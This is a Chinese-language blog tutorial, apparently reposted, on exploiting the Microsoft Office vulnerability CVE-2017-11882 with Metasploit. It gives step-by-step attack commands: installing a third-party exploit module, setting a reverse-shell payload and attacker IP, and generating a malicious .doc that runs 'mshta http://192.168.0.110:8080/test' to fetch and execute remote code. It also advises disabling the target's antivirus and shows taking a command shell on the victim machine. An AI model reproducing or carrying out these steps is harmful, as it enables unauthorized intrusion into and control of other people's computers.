您的位置:首页 > 其它

office漏洞 CVE-2017-11882 msf利用

2018-01-23 00:56 1026 查看
目标机:一台安装好office漏洞版本的电脑

攻击机:一台kai liunx                       ip:192.168.0.110

python脚本下载链接:https://github.com/Ridter/CVE-2017-11882



msf组件下载:https://github.com/0x09AL/CVE-2017-11882-metasploit



一.把上面下载的cve_2017_11882.rb文件复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目录下



二.把下载的cve_2017_11882.rtf放到/usr/share/metasploit-framework/data/exploits/



要是不放这个文件可能后面执行exploit时会出现运行失败

三.骚操作开始了,打开神器metasploit



四.使用命令search cve_2017_11882 查找对应的模块



五.使用命令use exploit/windows/smb/cve_2017_11882设置payload为反弹top



六.使用命令set lhost 192.168.0.110(攻击机的ip)



七.使用命令set URIPATH test设置URI的路径(注意这里设置的路径test,下面使用python脚本生成doc的时候也要加上这个路径)



八.检查配置,show options



九.运行,exploit -j



十.另外打开一个终端,把Command109b_CVE-2017-11882.py复制到kai liunx桌面,cd到桌面,运行命令python Command109b_CVE-2017-11882.py -c "mshta http://192.168.0.110:8080/test" -o test4.doc  生成恶意doc文件


注意要加上端口8080,加上上面设置的URI路径

十一.复制文件到目标机打开


360可能会杀掉最好关了

十二.返回攻击机kai liunx,看到鱼儿已经上钩了



十三.使用命令sessions -i进行查看



十四.输出命令sessions -i 1,切换进入



十五.现在我们成功的获取了目标机,输入shell,进入我们熟悉的cmd界面,并使用一下cmd命令。



感谢各位大佬赏脸,有什么不足的地方请多多指教,欢迎意见轰炸,谢谢!!!
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: